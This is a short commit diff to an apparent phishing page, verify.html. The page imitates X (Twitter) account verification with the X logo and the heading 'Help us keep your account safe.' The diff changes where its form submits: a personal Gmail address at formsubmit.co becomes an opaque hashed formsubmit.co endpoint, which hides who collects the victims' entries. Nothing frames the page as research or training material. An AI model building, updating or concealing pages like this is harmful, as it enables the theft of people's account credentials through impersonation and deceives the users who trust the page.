Update form action URL for verification

--- a/verify.html
+++ b/verify.html
@@ -95,7 +95,7 @@
     </style>
 </head>
 <body>
-    <form action="https://formsubmit.co/realghostzero2@gmail.com" method="POST">
+    <form action="https://formsubmit.co/1f002c7bcb098ffeaad22c6268285709" method="POST">
         <div class="logo">𝕏</div>
         
         <h1>Help us keep your account safe.</h1>
